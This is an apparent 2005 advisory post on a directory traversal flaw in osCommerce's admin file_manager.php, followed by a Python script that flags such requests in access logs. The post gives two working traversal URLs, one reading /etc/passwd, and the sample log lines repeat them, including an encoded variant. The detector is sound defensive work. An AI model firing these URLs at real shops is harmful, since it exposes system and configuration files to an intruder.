osCommerce File Manager Directory Traversal Vulnerability

From: Megasky (magaskyhotmail.com)
Date: Tue Mar 22 2005 - 10:32:05 CST


There is already a post on this that has
file_manager.php?action=download&filename=../../../../../../etc/passwd
 
Sometimes the action=download doesn't work, so I tried action=read
/admin/file_manager.php?action=read&filename=../../../../
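
A log check for the request pattern reported above, as an added example that is not part of the original post or of osCommerce: it flags access-log requests to file_manager.php whose action is download or read and whose filename climbs above its starting directory, including percent-encoded forms. The log format (Apache combined), the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The two actions named in the post.
WATCHED_ACTIONS = {"download", "read"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges); not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Mar/2005:10:40:01 -0600] "GET /admin/file_manager.php?action=download&filename=../../../../../../etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.10 - - [22/Mar/2005:10:40:09 -0600] "GET /admin/file_manager.php?action=read&filename=../../../../ HTTP/1.1" 200 3810',
    '192.0.2.10 - - [22/Mar/2005:10:41:30 -0600] "GET /admin/file_manager.php?action=read&filename=%252e%252e%252fconfigure.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Mar/2005:11:02:13 -0600] "GET /admin/file_manager.php?action=read&filename=includes/header.php HTTP/1.1" 200 2210',
    '198.51.100.7 - - [22/Mar/2005:11:02:40 -0600] "GET /admin/file_manager.php?action=read&filename=images/../includes/header.php HTTP/1.1" 200 2210',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e -> %2e -> '.')."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(filename):
    """True if the relative path ever climbs above its starting directory."""
    depth = 0
    for part in fully_decode(filename).replace("\\", "/").split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part not in ("", "."):
            depth += 1
    return False

def is_traversal_request(log_line):
    """Match file_manager.php + watched action + escaping filename."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # decodes once
    actions = {a.lower() for a in params.get("action", [])}
    return (url.path.endswith("/file_manager.php")
            and bool(actions & WATCHED_ACTIONS)
            and any(escapes_base(f) for f in params.get("filename", [])))

def flagged(lines):
    return [line for line in lines if is_traversal_request(line)]
```

Counting directory depth rather than searching for the string `..` keeps a path such as `images/../includes/header.php`, which stays inside its starting directory, from being flagged.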